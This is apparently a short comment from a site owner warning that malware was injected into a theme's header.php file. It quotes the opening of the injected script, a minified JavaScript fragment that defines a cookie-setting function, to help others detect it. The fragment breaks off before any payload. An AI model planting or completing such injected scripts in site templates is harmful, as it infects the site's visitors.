In my site also was this malware, its really hard to detect, but you should look your theme header.php files, i found this malware script there. `
It start like this:
<script>var a=”;setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e=”expires=”+d.toUTCString();document.cookie=a+”=”+b+”;
